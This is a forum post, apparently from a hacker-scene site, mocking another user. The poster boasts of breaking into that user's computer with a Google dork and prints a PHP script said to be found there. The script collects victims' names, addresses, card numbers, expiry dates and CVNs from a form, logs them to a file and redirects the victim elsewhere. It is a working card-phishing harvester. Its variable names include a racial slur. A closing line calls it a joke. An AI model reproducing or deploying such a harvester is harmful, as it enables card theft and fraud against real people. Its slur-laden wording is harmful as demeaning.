G00g13 D0rx H4x0r Exposed!

No replies
Shinobi
Offline
SX Crew
Joined: 2013/08/21

i found this lil script sitting on syrius computer after i hax0red the box with a google dork (that was provided by lattera)

E:\>cd /syrius

E:\Syrius\thehaxor>

E:\Syrius\thehaxor\phpscripts>dir
Volume in drive E has no label.
Volume Serial Number is 1337-7331

Directory of E:\Syrius\thehaxor\phpscripts

04/27/2014 12:53 PM 2,289 Ownedjo0.php
1 File(s) 2,289 bytes
2 Dir(s) 239,798,337,536 bytes free

----------------------------------------------------------------------------

<?php

$da_niggahs_name = !empty($_POST['da_niggahs_name']) ? $_POST['da_niggahs_name'] : 'N/A';
$Where_his_crib_be = !empty($_POST['Where_his_crib_be']) ? $_POST['Where_his_crib_be'] : 'N/A';
$city_He_Reps = !empty($_POST['city_He_Reps']) ? $_POST['city_He_Reps'] : 'N/A';
$Da_state_Bruh = !empty($_POST['Da_state_Bruh ']) ? $_POST['Da_state_Bruh'] : 'N/A';
$ZiptyCode = !empty($_POST['Ziptycode']) ? $_POST['Ziptycode'] : 'N/A';
$ccissued = !empty($_POST['CCissuedBy']) ? $_POST['CCissuedBy'] : 'N/A';
$DA_cc_numberzZ = !empty($_POST['DA_cc_numberzZ']) ? $_POST['DA_cc_numberzZ'] : 'N/A';
$debitor = !empty($_POST['DebitorCredit']) ? $_POST['DebitorCredit'] : 'N/A';
$expirem = !empty($_POST['CCExpireMonth']) ? $_POST['CCExpireMonth'] : 'N/A';
$expirey = !empty($_POST['CCExpireYear']) ? $_POST['CCExpireYear'] : 'N/A';
$dA_PASSCODE_cvn = !empty($_POST['dA_PASSCODE_cvn']) ? $_POST['dA_PASSCODE_cvn'] : 'N/A';

$handle = fopen("SyriusLeetHaxoredCCZ.txt", "rb");
$contents = '';
while (!feof($handle)) {
$contents .= fread($handle, 8192);
}
fclose($handle);

$fp = fopen('SyriusLeetHaxoredCCZ.txt', 'w+');

fwrite($fp, $contents . "\n");
fwrite($fp, 'full name :' . $da_niggahs_name . "\r\n");
fwrite($fp, 'address :' . $Where_his_crib_be . "\r\n");
fwrite($fp, 'city :' . $city_He_Reps . "\r\n");
fwrite($fp, 'state :' . $Da_state_Bruh . "\r\n");
fwrite($fp, 'zipcode :' . $ziptycode . "\r\n");
fwrite($fp, 'CCissuedBy :' . $ccissued . "\r\n");
fwrite($fp, 'CCnumber :' . $DA_cc_numberzZ . "\r\n");
fwrite($fp, 'DebitorCredit :' . $debitor . "\r\n");
fwrite($fp, 'CCExpireMonth :' . $expirem . "\r\n");
fwrite($fp, 'CCExpireYear :' . $expirey . "\r\n");
fwrite($fp, 'CVN :' . $dA_PASSCODE_cvn . "\n");
fwrite($fp, '-----------Your cc has been scammed by da google dork haxor---syrius!---------------------------' . "\r\n");
fclose($fp);
header('Location: http://www.syrius-owns-dat-ass.com');
?>

(script written here was a joke and sole purpose was written for comedy and comedy alone!No hax0rs was hurt in the maken of dis hur joke!)